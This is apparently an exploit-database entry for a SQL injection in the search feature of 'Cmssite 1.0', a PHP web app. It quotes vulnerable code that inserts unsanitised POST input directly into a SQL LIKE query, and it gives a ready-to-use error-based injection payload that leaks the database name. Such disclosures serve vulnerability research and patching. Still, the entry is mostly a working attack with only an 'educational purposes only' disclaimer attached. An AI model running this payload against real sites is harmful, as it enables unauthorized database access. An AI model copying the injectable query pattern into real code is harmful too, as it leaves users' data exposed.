Exploits / Vulnerability Discovered : 2019-01-28 |
Type : webapps |
Platform : php
This exploit / vulnerability Cmssite 1.0 search sql injection is for educational purposes only and if it is used you will do on your own risk!
if (isset($_POST['submit'])) {
$search = $_POST["search"];
}
$query = "SELECT * FROM posts WHERE post_tags LIKE '%$search%' AND
post_status='publish'";
$search_query = mysqli_query($con, $query);
# payload on search text box: ' and
extractvalue(1,concat(':',database(),':'))#